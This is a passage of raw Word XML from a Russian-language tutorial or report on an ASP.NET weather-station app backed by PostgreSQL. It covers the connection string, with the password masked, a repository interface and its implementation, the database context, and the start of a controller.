    <w:p w14:paraId="3F9EC49C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="009473D1" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009473D1">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009473D1">
        <w:t>ConnectionStrings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009473D1">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E95868" w14:textId="72D6C7E4" w:rsidR="0093378B" w:rsidRPr="009473D1" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009473D1">
        <w:t>DefaultConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009473D1">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"Host=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>localhost;Port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>=5432;Database=meteostation;Username=postgres;Password=</w:t>
      </w:r>
      <w:r w:rsidR="00D7766A" w:rsidRPr="00D7766A">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="A31515"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF16F6A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4C02FB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:r>
        <w:t xml:space="preserve">В данной строке необходимо указать порт, по которому доступна программа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сервера, имя базы данных, имя пользователя-хозяина базы данных и пароль.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1B5059" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:r>
        <w:t xml:space="preserve">Ключевым объектом в концепции внедрения зависимостей в данном примере является интерфейс </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, потому что в контроллере будет создан экземпляр именно интерфейса, а не самого класса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>MeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009473D1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Это нужно для того, чтобы функционал манипулирования данных в контроллере строго задавался в интерфейсе какой-либо конкретной модели. Интерфейс находится в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009473D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E60ECB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009473D1">
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CD25EE2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8ED579" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IQueryable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Measurements</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r w:rsidRPr="009473D1">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA066D7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7395FE86" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009473D1">
      <w:r>
        <w:t xml:space="preserve">Далее необходимо создать реализацию интерфейса, где будет определена сама логика манипулирования данными, реализация интерфейса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">находится в файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>MeasurementRepository.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и выглядит следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C525244" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="2B91AF"/>
        </w:rPr>
        <w:t>MeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00452770">
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D2AD0A5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9330E4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00452770">
        <w:t>ApplicationDbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> _context;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC78AB1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="2B91AF"/>
        </w:rPr>
        <w:t>MeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>ApplicationDbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520AFC6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720401FD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">        _context = context;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECD368E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2B1F0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00452770">
        <w:t>IQueryable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>&lt;Measurement&gt; Measurements =&gt; _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00452770">
        <w:t>context.Measurement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F61218B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C50DE23" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:r>
        <w:t xml:space="preserve">В конструкторе данного класса инициализируется контекст данных, из файла </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>ApplicationDbContext.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>который будет рассмотрен ниже, а также реализован единственный метод, определённый в интерфейсе, который возвращает данные из БД.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5566BC4E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00084743" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В файле </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>ApplicationDbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, который наследуется от базового стандартного класса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>DbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">содержится конструктор и свойство </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>DbSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. С помощью этого свойства можно обращаться к БД за записями из таблицы </w:t>
      </w:r>
      <w:r w:rsidRPr="00463F70">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Measurement</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Файл</w:t>
      </w:r>
      <w:r w:rsidRPr="00084743">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ApplicationDbContext.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00084743">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>выглядит</w:t>
      </w:r>
      <w:r w:rsidRPr="00084743">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>следующим</w:t>
      </w:r>
      <w:r w:rsidRPr="00084743">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>образом</w:t>
      </w:r>
      <w:r w:rsidRPr="00084743">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6152E323" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00452770" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="2B91AF"/>
        </w:rPr>
        <w:t>ApplicationDbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>DbContextOptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00452770">
        <w:t>ApplicationDbContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">&gt; options) : </w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">(options) { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00452770">
        <w:t>Database.EnsureCreated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t>(); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E097A5" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00452770">
        <w:t>DbSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">&lt;Measurement&gt; Measurement </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00452770">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00452770">
        <w:t>; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A267E4B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00AE25A7" w:rsidRDefault="0093378B" w:rsidP="00452770">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После создания репозитория и подключения к базе данных необходимо определить контроллер, который будет отвечать за обработку данных из модели. Для этого в контроллере необходимо создать экземпляр класса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и проинициализировать его в конструкторе. Содержимое</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5112">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HomeController.cs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>выглядит</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>следующим</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>образом</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C7C58F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00112081" w:rsidRDefault="0093378B" w:rsidP="00112081">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r w:rsidRPr="00112081">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>readonly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>IMeasurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t xml:space="preserve"> _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00112081">
        <w:t>measurementRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00112081">
        <w:t>;</w:t>
      </w:r>
